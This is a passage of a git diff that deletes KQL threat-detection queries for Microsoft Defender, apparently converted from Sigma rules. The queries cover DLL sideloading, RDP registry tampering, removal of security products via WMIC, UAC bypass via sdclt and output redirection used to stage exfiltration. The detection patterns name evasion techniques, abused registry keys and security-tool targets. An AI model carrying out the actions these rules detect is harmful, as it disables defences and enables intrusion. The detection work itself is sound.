"\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
deleted file mode 100644
index 6cbd83b0..00000000
--- a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
-// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql b/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql
deleted file mode 100644
index b51227cf..00000000
--- a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/01/30
-// Level: high
-// Description: Detects uninstallation or termination of security products using the WMIC utility
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
deleted file mode 100644
index cb5229ea..00000000
--- a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql
deleted file mode 100644
index da809f2c..00000000
--- a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql b/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql
deleted file mode 100644
index 4753e096..00000000
--- a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects potential DLL sideloading of "wwlib.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql b/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql
deleted file mode 100644
index 77fc4544..00000000
--- a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql b/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql
deleted file mode 100644
index 91f57b60..00000000
--- a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/05/18
-// Level: high
-// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceRegistryEvents
-| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql b/Defense Evasion/Potential_Winnti_Dropper_Activity.kql
deleted file mode 100644
index fd24affe..00000000
--- a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
-// Tags: attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql b/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql
deleted file mode 100644
index fa40db7c..00000000
--- a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: high
-// Description: Detects potential DLL sideloading of "appverifUI.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql b/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql
deleted file mode 100644
index 3695de47..00000000
--- a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects usage of Dsacls to grant over permissive permissions
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql b/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql
deleted file mode 100644
index 0c07adec..00000000
--- a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: high
-// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql b/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql
deleted file mode 100644
index cb8fcc62..00000000
--- a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: medium
-// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
-This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and 